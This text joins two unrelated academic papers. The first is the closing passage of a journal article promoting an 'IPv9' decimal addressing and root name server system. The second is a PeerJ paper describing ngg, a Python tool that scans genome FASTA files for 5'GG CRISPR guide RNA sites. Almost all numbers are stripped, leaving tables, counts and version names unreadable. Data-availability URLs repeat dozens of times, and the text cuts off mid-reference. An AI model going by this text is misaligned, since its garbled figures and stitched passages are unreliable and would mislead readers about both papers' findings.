unicast type each interface is configured with an identifier, and the packet identifies the identifier to reach the specified interface; an identifier in any on-demand type represents a group of interfaces of different nodes, and the shortest path interface is selected through a routing protocol and transmit the data packet to the interface; multicast is to use the multicast address to send the data packet to each international journal of advanced network, monitoring and controls volume , no. , interface indicated by the identifier, and the shortest path interface will not be selected. ipv uses the "decimalization and brackets" approach in two forms: a) use the complete brackets to represent bits. in this way, the brackets can be ignored when entering a web address in the browser's address bar. b) divide the -bit address into segments, each segment being bits, "a [b] [c] [d] [e] [f] g [h". ipv addresses are very compatible with ipv and ipv . the mapping relationship is shown in table and table . the addresses of ipv and ipv are kept intact in the last bit address segment, and the value of the first address is used as an identifier to point to ipv or ipv . table i. mapping relationship from ipv to ipv address number - - - - length (bits)) mapping [ [ ipv address table ii. mapping relationship from ipv to ipv address number - - - length (bits)) mapping [ [ ipv address for ipv nodes in tunneling technology, they need to be assigned ipv /ipv compatible addresses to communicate with other nodes in the corresponding network. the mapping strategy for this situation is shown in table , where the first prefix is , the and values in the token bit correspond to ipv and ipv respectively, and the rest are reserved for future function expansion. table iii. ipv compatibility with ipv /ipv address number - - - - - - - length (bits)) content prefix keep mark scope ipv ipv address ) message protocol table iv. ipv message protocol version number traffic flow type flow label address length priority traffic class address authentication absolute traffic payload length next header limit jump times source address( bit) destination address( bit) time identification code international journal of advanced network, monitoring and controls volume , no. , the total header length of ipv is bytes, which is more than that of ipv but more concise. the format is shown in table , which consists of ten parts: protocol version number, communication flow type, payload length, stream label, next header, hop limit, source address, destination address, time, identification code, etc. in ipv , the optional information of other layers is placed in the extended header between the high-level protocol header and the ipv header, and its structure is shown in table . an ipv packet can carry one or more or even no extension headers, and each subsequent extension header location is marked in its previous header. table v. extension headers ipv header next header=tcp tcp header + data ipv header next header=route ipv header next header=tcp tcp header + data ipv header next header=route ipv header next header=data segment ipv header next header=tcp tcp data segment header + data ) transition protocol the ipv transition protocol specifies the ipv transition header format and the definition of the address text representation, addressing model, and node address, including a detailed description of the currently defined transition header and address format. the header in the transition period uses the original ipv header, and only changes the version number to to distinguish it from the original ipv header. the last two segments of the ipv address are adopted for the interim address, which is bits in total. d. the system architecture of ipv ipv /future network root domain name server system, consisting of a parent root server, a master root server, equal-name root domain name servers named by english n-z, top-level domain name servers of countries and regions like .chn,.usa,.hkg,.mac, routing management systems, application servers and gigabit backbone routers. its working principle is that root domain name servers read the main root server first, then read the parent root server, and after obtaining the data, they will spread to the whole network. only root domain name servers can access this hidden distribution host. this hidden publishing host is maintained. root domain name servers read its data, which is read by the mirror server, and then spread to the entire network. the ipv root domain name server system is shown in figure . the root name server is the highest-level domain name server in the internet domain name system (dns). it is mainly used to manage the internet's home directory, and is responsible for providing authorized domain name server addresses for top level domain tld resolution. it is the necessary infrastructure for constructing the internet. many computer scientists refer to the root domain name server as "truth", which shows its importance. currently, the internet's root domain name server, gtld, and cctld are all managed and controlled by icann (internet corporation for assigned names and numbers) authorized by the us government. attacking the root domain name server is the most direct and deadly method of attacking the internet. in the existing internet, the root server is completely controlled by the united states, which poses a great risk to other international journal of advanced network, monitoring and controls volume , no. , countries. the ipv root dns that can adapt to ipv networks, ipv networks, and ipv networks, use decimal network technology to organize, build, secure, controllable, face global users, and serve chinese, english, digital and other languages , and can provide personalized broadband multimedia communication services on the communication network to provide english, digital, chinese domain name resolution function. the ipv resolution system can ensure that the domain used by online users are resolved by the domain server to obtain the ip address of the corresponding access object, which is compatible with the current various domain services. figure . the system of ipv root name server international journal of advanced network, monitoring and controls volume , no. , this root domain name resolution systems based on ipv , able to adapt to ipv network, ipv network, ipv network, through the organization and construction of decimal network technology, with a safe and controllable appearance for global users, and can provide services and personality in various languages provide broadband, multimedia communication service communication network to provide english, digital, chinese domain name resolution function. the ipv resolution system can ensure that the domain names used by online users are resolved by the domain name server to obtain the ip address of the corresponding access object, and can also send requests for non-numeric domain names to the corresponding english domain name server or chinese domain name server, as well as various language domain name servers, while providing digital domain name resolution functions, are also compatible with providing chinese and english domain name resolution services. e. the architecture design of ipv the conventional data packet exchange of the current tcp / ip protocol cannot support true real-time applications and circuit switching, and the application of circuit transmission of sound or images in the four-layer protocol. in addition, the existing tcp / ip protocol is a connectionless and unreliable data packet protocol with a maximum packet length of bytes. with the integration of voice, image and data, the establishment of a new network theoretical foundation has become an urgent task. the design purpose of ipv is to avoid large-scale changes of the existing ip protocol, leading to the next-generation internet can be backward compatible. the main idea of the design is to merge the ip protocol of tcp/ip with circuit switching. using a router compatible with the two protocols, the designer envisions that through a series of protocols, the addresses of the three protocols (ipv /ipv /ipv ) simultaneous use in the internet, gradually replacing the current internet structure without excessively affecting the current internet. due to the rational design of ipv , it has received the attention of iso and the international internet association. ) the level system of ipv the ipv system uses a three-layer circuit / four-layer packet hybrid network architecture, and adopts the communication network transmission mode of authentication before communication rules. it was first proposed by china and has formed a demonstration project. the architecture is shown in figure . figure . the level system of ipv international journal of advanced network, monitoring and controls volume , no. , ) the connection of ipv ipv 's tcp / ip / m protocol, in addition to inheriting the existing tcp / ip protocol connectionless and unreliable data packet protocol, also develops absolute code streams and long stream code classes. long packets can reach more than tens of megabytes. can use three layers to directly transmit telephone and cable tv data to establish a four-layer three-layer transmission protocol with the new transmission theory. the connection method is shown in figure . figure . the connection of ipv the ipv network management system is a comprehensive network management system that provides network monitoring and other functions based on a web interface. it can monitor various network parameters and server parameters to ensure the safe operation of the server system; it also supports ipv and ipv protocols, and provides a flexible notification mechanism to allow system administrators to quickly locate and solve various problems. through the use of ipv design routers, clients, protocol conversion routers and other equipment to build a pure ipv network, ipv /ipv hybrid network to achieve a new generation of independent intellectual property security and control of the internet system. including the domestically-controlled and self-controllable ipv /future network root domain name system, promoting technology integration, business integration, and data integration to achieve cross-layer, cross-region, cross-system, cross-department, and cross-business collaborative management and services. take data centralization and sharing as a means to build a nationally integrated national big data center and gateway bureau, speed up the promotion of domestically made independent and controllable alternative plans, and build a safe and controllable information technology system. be independent of the control of the us domain name system and realize an independent domain name system. f. the application examples of ipv ) the application of g-future network/ipv movie network release application now the g network of china unicom beijing and china mobile suzhou have been directly connected through the ipv fiber routing backbone node of international journal of advanced network, monitoring and controls volume , no. , beijing university of posts and telecommunications and the ipv national backbone optical cable network, and achieved the world's first time end-to-end mbps to mbps speed on may this year. on the ipv national backbone network + g local access/ g core network, the digital film program network distribution work was successfully carried out, and the national network distribution of chinese movies was first entered in the new era of "one hour". ) "health tai'an " ipv big data platform "health tai'an "ipv big data platform project relies on the existing backbone optical cable and user transmission access network of shandong broadcast network co. ltd. tai'an branch, using ipv network technology to upgrading and construction, cover the medical and health institutions of the city, county, township and village levels and the medical insurance bureau, the administrative department and the finance bureau of tai'an, and further expand to families and individuals. the bandwidth meets the requirements of healthy tai'an big data business and can be sustainable. the expansion realizes compatible security operation between ipv network and ipv network (also realizes logical security isolation between ipv and ipv and ipv networks). iv. conclusion nowadays, the lack of ip addresses has become the main reason restricting its development. ipv has a huge address capacity, and it is better than ipv in terms of security, compatibility, efficiency, and cost savings. it is more suitable in china development. this article introduces the characteristics, production process, protocol and composition of ipv . ipv is independently developed by chinese and has independent intellectual property rights. at the same time, it can solve the remaining problems of ipv and can be the core key technology of the next generation internet. the new network should not be an upgrade of the old network, but a new network system structure. if it can be promoted, it will definitely promote the great development of the internet. reference [ ] information technology-futurenetwork-problem statement and requirement-part : security, iso/iec dtr - , , . [ ] heyudan, zhu lian, etc. commercial radio-frequency identification tag data format. sb/t - , , . [ ] xie jianping, kong ning, etc. domain name specification based on rfid technology used for products and service. sj/t - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession.sj/t - , . . [ ] xie jianping etc. digital domain name specification, sj/t - , . . [ ] xie jianpingetc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, [ ] xie jianping, xu dongmei, etc. digital domain name specification.sj/t - , . . identification of high-efficiency 'gg grna motifs in indexed fasta files with ngg submitted april accepted october published november corresponding author elisha d. roberson, eroberso@dom.wustl.edu academic editor kjiersten fagnan additional information and declarations can be found on page doi . /peerj-cs. copyright roberson distributed under creative commons cc-by . open access identification of high-efficiency ′gg grna motifs in indexed fasta files with ngg elisha d. roberson departments of medicine & genetics, division of rheumatology, washington university in saint louis, saint louis, mo, united states of america abstract crispr/cas is emerging as one of the most-used methods of genome modification in organisms ranging from bacteria to human cells. however, the efficiency of editing varies tremendously site-to-site. a recent report identified a novel motif, called the ′gg motif, which substantially increases the efficiency of editing at all sites tested in c. elegans. furthermore, they highlighted that previously published grnas with high editing efficiency also had this motif. i designed a python command-line tool, ngg , to identify ′gg grna sites from indexed fasta files. as a proof-of-concept, i screened for these motifs in six model genomes: saccharomyces cerevisiae, caenorhabditis elegans, drosophila melanogaster, danio rerio, mus musculus, and homo sapiens. i also scanned the genomes of pig (sus scrofa) and african elephant (loxodonta africana) to demonstrate the utility in non-model organisms. i identified more than million single match ′gg motifs in these genomes. greater than % of all protein coding genes in the reference genomes had at least one unique ′gg grna site overlapping an exon. in particular, more than % of mouse and % of human protein coding genes have at least one unique, overlapping ′gg grna. these identified sites can be used as a starting point in grna selection, and the ngg tool provides an important ability to identify ′gg editing sites in any species with an available genome sequence. subjects bioinformatics, computational biology, data science, databases keywords grna, motif discovery, python, open-source, crispr/cas , ′gg introduction genome engineering allows for the targeted deletion or modification by homology directed repair of a target locus. currently, one of the most popular methods for genome manipulation is the clustered regularly interspaced short palindromic repeat (crispr)/crispr associated protein (cas ) system adapted from streptococcus pyogenes. the s. pyogenes crispr/cas system was initially thought to represent a novel dna repair mechanism, but was eventually found to provide heritable bacterial immunity to invading exogenous dna, such as plasmids and bacteriophages (barrangou et al., ; makarova et al., ). during endogenous crispr/cas function, foreign dna integrates into the crispr locus. the bacterial cell then expresses the pre-crispr rna (crrna) and a trans-activating crrna (tracrrna) that pair to form a complex that how to cite this article roberson ( ), identification of high-efficiency ′gg grna motifs in indexed fasta files with ngg . peerj comput. sci. :e ; doi . /peerj-cs. mailto:eroberso@dom.wustl.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. is cleaved by rnase iii (deltcheva et al., ). the resulting rna is a hybrid of the pre-crrna and the tracrrna, and includes a bp guide rna (grna) sequence. the grna is incorporated into cas and can then guide the cleavage of a complementary dna sequence by the nuclease activity of the cas protein. the topic of crispr-cas genome editing has been reviewed extensively elsewhere (doudna & charpentier, ; hsu, lander & zhang, ; jiang & doudna, ; mali, esvelt & church, ). codon-optimized versions of cas are available for a wide range of organisms, and can easily be synthesized if it is not already available. transfecting cells with cas plasmid along with a fused crrna-tracrrna hybrid construct called a single-guide rna (sgrna) allows for temporary activity of cas . alternatively, cells can also be transfected with a cas protein preloaded with a grna to reduce off target effects (kim et al., ). keeping a stock of plasmids with a sgrna backbone minus the grna site makes it easy to quickly generate new sgrna plasmids by site-directed mutagenesis. the cas protein loaded with the sgrna will bind to sites complementary genomic loci, but will only cut it if a protospacer adjacent motif (pam) site immediately follows the complementary sequence (mojica et al., ). the pam site for the commonly-used streptococcus pyogenes type-ii crispr is an ngg motif. therefore, a s. pyogenes cas grna site can be defined as n ngg. it is important to note that constitutively expressed sgrnas typically use a u snrna promoter that strongly prefers a g starting base. for u compatibility, sequences starting with a, c, or t may be used if they are cloned into a sgrna vector with an appended g base, resulting in a bp grna (farboud & meyer, ; ran et al., b), or by incorporating the grna into a trna poly-cistron and taking advantage of trna processing cleavage (xie, minkenberg & yang, ). i will refer to the subset grna sites contain a starting g base (gn ngg) as canonical ′gg grna sites. the rate of editing using the crispr/cas system is far higher than homologous recombination, but higher efficiency is still desirable. the introduction of a longer stem in part the sgrna stem-loop structure and the flip of a single a in a polya track of a separate sgrna stem-loop, called the flip + extension (f + e) sgrna design, resulted in increased cas editing efficiency (chen et al., ). recently, another improvement was reported that increases efficiency. grna sites with a gg motif adjacent to the pam site, called ′gg grnas, have far higher activity than equivalent grna sites in the same region (farboud & meyer, ). these sites take the form of n ggngg. the ′gg motif efficiency in species other than c. elegans is unknown. tools already exist to identify s. pyogenes cas grna targets in sequences via a web interface for an input dna, or for common model organisms (gratz et al., ; heigwer, kerr & boutros, ; liu et al., ; montague et al., ; naito et al., ; stemmer et al., ; xiao et al., ). however, there are limitations to these methods. searching a whole genome for grna sites is not feasible via a web interface unless the genome is exceptionally small. there is already support for most model organisms, but leaves individuals working on less commonly studied species without a resource. in this manuscript, i report a python command-line tool, ngg , for identification of ′gg grna motifs from indexed fasta genome files. as a proof of concept, i report all ′gg grna roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. motifs in model species plus two additional mammalian genomes, identifying more than million sites, of which more than million are unique matches within the reference genome for that species. more than % of all protein coding genes in / species have at least one unique ′gg grna overlapping it for potential editing. materials & methods ngg motif identification i designed ngg using python with compiled regular expressions for the ′gg grna plus pam motif. the use of compiled regular expressions makes the search quite efficient even for relatively large genomes. this tool is python based, relying on the python base functions and some external dependencies, such as the regex and pyfaidx packages. ngg uses the fasta index via pyfaidx (shirley et al., ) to directly seek the genomic target without reading the entire file. the default mode scrapes the entire fasta input for ′gg grna sites, but individual contigs or contig regions can be specified instead. ngg identifies these sites on both the sense and antisense strands independently for each chromosome, facilitating multiprocessing to decrease computation time. ngg buffers all detected grna sites in memory, and then identifies uniqueness by storing the grna sites in a dictionary. this means that all unique sites will be appropriately flagged, but near matches, i.e., single-base mismatches will not. the output from this tool could be pipelined with other tools, or further extended with biopython to allow for identification of near matches as they are beyond the scope of this tool. the output can be extended to include non-canonical sites starting with any base. ngg output includes the contig name, start and end positions, the grna sequence, the pam sequence, whether the site starts with a g, and whether the grna sequence was unique in the searched region. for a whole-genome this is very handy, but be aware that selecting only a small region will only tell you if a grna is unique within the region, not the genome. the source code for ngg is available from github. multi-species site identification i used ngg to identify all ′gg grna motifs commonly studied organisms and two others: saccharomyces cerevisiae, caenorhabditis elegans, drosophila melanogaster, danio rerio, mus musculus, homo sapiens, sus scrofa, and loxodonta africana. i used a gnu make script to download genomes and gtf gene annotations, calculate genome gc content, and annotate genes in r to enable reproducibility. the makefile downloads the top-level or primary assembly genomes from ensembl release , runs ngg on all contigs for each fasta file, and calculates gc content for each genome. i based the gc content of each genome from non-n base content. after identifying grna sites, i used r, particularly relying on the plyr, dplyr, tidyr, magrittr, genomicranges, and genomicfeatures packages, to identify the overlap of each grna with gene exons and tabulate the number of genes overlapping at least one grna (lawrence et al., ; r core team, ). a grna was considered overlapping a gene if at least one base of grna sequence overlapped at least one base of exonic sequence. the best roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table count of grna classes in each species. all n ggngg motifs are included in the ‘all grnas’ section, while only canonical grnas starting with a g are in the ‘canonical grnas’ section. the ‘all’ class accumulates all matching motifs for that section, while the ‘unique’ class counts only sites with on exact match in the reference genome. all grnas canonical grnas all unique all unique s. cerevisiae , , , , c. elegans , , , , d. melanogaster , , , , d. rerio , , , , , , m. musculus , , , , , , , , s. scrofa , , , , , , , , h. sapiens , , , , , , , , l. africana , , , , , , , , total , , , , , , , , case puts the cut site within the exon body and should certainly disrupt the gene. the worst case of a bp overlap cutting in an intron should still generate indels big enough to extend into the exon or to delete a canonical splice site. i calculated all summary statistics and generated ggplot figures using rstudio (v . . ) markdown with knitr (xie, ). results ′gg grna sites are common in each species overall, i identified greater than million ′gg grna sites in the tested genomes (table ). some of these grna sequences were not unique in a given genome, leaving more than million unique ′gg sites. approximately million of the million unique sites were canonical g starting motifs. the sites identified in each species with the grna sequence, pam sequence, genome coordinates, annotated overlapping genes, and number of perfect genome matches are available for download (roberson, ). the r scripts, python files, and make files are also available in a public repository for reproducibility. the genomes i analyzed had vastly different sizes, ranging from approximately mb for yeast to greater than gb for humans and elephants, and as a result had dramatically different numbers of ′gg grna sites per genome. therefore, i also assessed the site density per megabase of reference genome size (table ). unique sites with a g starting base averaged a density of , sites/mb, or site per bp. all unique sites averaged , sites/mb, or unique ′gg grna site per bp. d. rerio had the lowest density at unique g-start sites/mb, while d. melanogaster had the highest density at , unique sites/mb. the low density of unique sites in zebrafish may be due to genome complexity from previous duplication events i profiled the performance of canonical g-start grna searches in each of the tested genomes for both block and exhaustive scans using both and cpus (table ). the parallelization in this program is by contig and strand, so the maximum utilized number roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table ′gg grna sites per megabase genome size. reference genome size was determined from the species fasta index. the number of unique ′gg grna sites in the genomes is encouraging, with an average across all species of one unique site per kb of genome. all grnas canonical grnas all unique all unique s. cerevisiae , . , . . . c. elegans , . , . . . d. melanogaster , . , . , . , . d. rerio , . , . . . m. musculus , . , . , . , . s. scrofa , . , . , . , . h. sapiens , . , . , . , . l. africana , . , . , . , . table run times with one and multiple cpus. profiling was performed using python v . . using or processors on a server with intel i - k processors and gb of ram. canonical grnas were searched for benchmark purposes. when possible, it is clearly advantageous to use multiple processors to accelerate grna searches. block exhaustive cpu cpu delta cpu cpu delta saccharomyces cerevisiae . . − % . . − % caenorhabditis elegans . . − % . . − % drosophila melanogaster . . − % . . − % danio rerio . . − % . . − % mus musculus . . − % . . − % sus scrofa . . − % . . − % homo sapiens . . − % . . − % loxodonta africana . . − % . . − % of threads would be twice the number of contigs. using cpus reduced runtimes by approximately – % in all cases. it is worth noting that exhaustively scraping the human genome for canonical sites took only . s with cpus, and even the longest search took only . s for sus scrofa using cpus. little strand bias observed for canonical ′gg grna sites the strand of each grna site with respect to the reference was included in the ngg output files. for each organism, i considered every grna site as an independent bernoulli trial with a % probability of a “sense” strand designation as a successful trial outcome (table ). / species showed strand bias for all grna sites (c. elegans, d. melanogaster, d. rerio, h. sapiens, l. africana). only c. elegans and h. sapiens demonstrated strand bias significantly different from the expected ratio for canonical ′gg sites. while the difference in strand selection is significant, it may be unimportant to editing site selection. wildtype cas cleaves both dna strands simultaneously, and therefore the strand of the target roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table strand bias for grna sites. the grna type is either all ′gg sites or only canonical g starting grna sites. the estimate column is the estimated rate of positive strand selection observed. the p-value column is detected for whether the bernoulli trial estimates differ significantly a / strand selection, and the adjusted p-value is based on a benjamini–hochberg false-discovery rate correction. grna type species estimate p. value p. adj all saccharomyces cerevisiae . . e− . e+ caenorhabditis elegans . . e− . e− drosophila melanogaster . . e− . e− danio rerio . . e− . e− mus musculus . . e− . e+ homo sapiens . . e− . e− loxodonta africana . . e− . e− sus scrofa . . e− . e+ canonical saccharomyces cerevisiae . . e− . e+ caenorhabditis elegans . . e− . e− drosophila melanogaster . . e− . e+ danio rerio . . e− . e− mus musculus . . e− . e− homo sapiens . . e− . e− loxodonta africana . . e− . e+ sus scrofa . . e− . e+ sequence doesn’t matter. strategies that employ dual nickases to reduce off target effects could be affected by such bias, as they require two separate grna sites on opposite strands (ran et al., a). the difference observed is less than . % different from expected % ratio, and whether this functionally affects the ability to choose paired ′gg grnas remains to be seen. cgg & ggg pam sites are underrepresented i visualized the distribution of the four pam sites (agg, cgg, ggg, tgg) as a stacked bar chart of each sites proportion of the total identified sites in each species (fig. ). in general, the agg and tgg sites represented the majority of ′gg grna sites in all species. i tested whether pam site distribution differed from chance based on the gc content of the reference genome. for each species, i considered each pam site a bernoulli trial, and defined success as either cgg or ggg site identity. the probability of success was set equal to the estimated genome-wide gc content calculated from the reference genome, excluding n bases (table ). none of the tested genomes met the expected gc success rate. the rate of picking a cgg or ggg pam was less than the genome gc content in s. cerevisiae, m. musculus, sus scrofa, loxodonta africana, and h. sapiens. in particular, the estimate for m. musculus, h. sapiens, and loxodonta africana was > % different from the genome gc fraction. this is not necessarily unexpected. the cgg pam site includes a ′ cpg dinucleotide that is generally underrepresented due to the relatively high frequency of methyl-cytosine deamination to thymine. c. elegans, d. melanogaster, and d. rerio were the exceptions, with cgg and ggg pam selection greater than the expected frequency. roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pam site usage across tested species. each species has four potential protospacer adjacent motifs (pam) possible for identified grna sites. the stacked bar chart shows the fraction of all pam sites each motif occupies. the cgg motif, that includes a cpg dinucleotide, is the least prevalent motif in the zebrafish, mouse, human, elephant, and pig genomes. however, c. elegans may not be unexpected, as it lacks dna methylation and would not necessarily be at an advantage to limit cpg dinucleotides. most protein coding genes overlap at least one unique ′gg grna a common use of genome engineering is to knock out or otherwise modify the function of a protein coding gene. the efficiency of such edits is critical, as just introducing frame-shifting mutations can require screening a large number single-cell clones or derived animals to identify a successful edit. as part of this study, i annotated for each grna in the species if there was any overlap with a gene. conversely, i also annotate a count of how many of each of the four classes (all sites, all unique sites, canonical sites, and unique canonical sites) overlap every gene. no less than % of any species’ genes overlap at least one unique ′gg grna (table ). this catalog of potential sites demonstrates that most protein coding genes can be targeted by at least one ′gg grna site to achieve high editing efficiency. discussion in this manuscript, i have described a new tool for identifying ′gg grna sites and presented a catalog of potential editing sites in species. importantly, many genomic loci roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table pam site frequency compared to genome gc content. the average genome gc content and the estimated chance of picking a gc pam site (cgg or ggg) are shown for each species. gc content was calculated from the downloaded reference files. grna type species gc estimate p. value p. adj all saccharomyces cerevisiae . . . e− . e− caenorhabditis elegans . . . e− . e− drosophila melanogaster . . . e− . e− danio rerio . . . e− . e− mus musculus . . . e− . e− homo sapiens . . . e− . e− loxodonta africana . . . e− . e− sus scrofa . . . e− . e− canonical saccharomyces cerevisiae . . . e− . e− caenorhabditis elegans . . . e− . e− drosophila melanogaster . . . e− . e− danio rerio . . . e− . e− mus musculus . . . e− . e− homo sapiens . . . e− . e− loxodonta africana . . . e− . e− sus scrofa . . . e− . e− table fraction of genes overlapping at least one grna. ensembl gtf files were used to annotate overlap of grna sites with known genes. a gene was called as potentially cut if at least one grna overlapped at least base with an exon of that gene. most genes in the species have at least one unique cut per gene. all motifs canonical motifs species all unique all unique s. cerevisiae . . . . c. elegans . . . . d. melanogaster . . . . d. rerio . . . . m. musculus . . . . s. scrofa . . . . h. sapiens . . . . l. africana . . . . can be targeted by unique ′gg grna sites. the efficiency of ′gg grna sites in species other than c. elegans has yet to be established, but is worth further study. this tool reports the uniqueness of identified sites, but blast searching of potential grna sequences is warranted to identify near-match sites. it is also important to consider the target genome’s specific genotypes when designing a grna. in particular, variants that alter pam sites away from ngg will not be cleaved by cas even if the grna is an exact match. roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the accuracy of editing can be improved by using two grnas and a mutant cas nickase. i observed significant, but low-effect strand bias in these genomes. this may lead to some loci not being compatible with paired ′gg grna sites. when possible, choosing paired ′gg grna sites should be strongly considered. efficiencies of less than % were increased to % efficiency or greater by using the ′gg strategy (farboud & meyer, ). as such, using paired ′gg grnas with a nickase may give the best of both worlds with both high accuracy and high efficiency. it is important to note that ngg will operate on any indexed fasta file. many grna site finding tools are limited to catalogs of grna sites in model organisms. this tool fills an important gap for individuals working outside of commonly used species, demonstrated by the use of ngg on the genomes of s. scrofa and l. africana. the provided grna site survey and associated tool, ngg , represent a valuable resource for designing genomic modification strategies. acknowledgements i wish to thank dr. li cao for her helpful comments during the preparation of this manuscript, and dr. matthew shirley for his suggested use of pyfaidx. additional information and declarations funding a portion of effort spent on designing this software was supported under nih p ar as an activity of the human genomics and bioinformatics facility in the washington university rheumatic disease core center. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: nih: p ar . competing interests i have no competing interests related to this manuscript or tool. author contributions • elisha d. roberson conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/robersonlab/ngg https://github.com/robersonlab/ ngg manuscript http://dx.doi.org/ . /m .figshare. . roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ngg https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript https://github.com/robersonlab/ _ngg _manuscript http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. references barrangou r, fremaux c, deveau h, richards m, boyaval p, moineau s, romero da, horvath p. . crispr provides acquired resistance against viruses in prokaryotes. science : – doi . /science. . chen b, gilbert luke a, cimini ba, schnitzbauer j, zhang w, li g-w, park j, blackburn 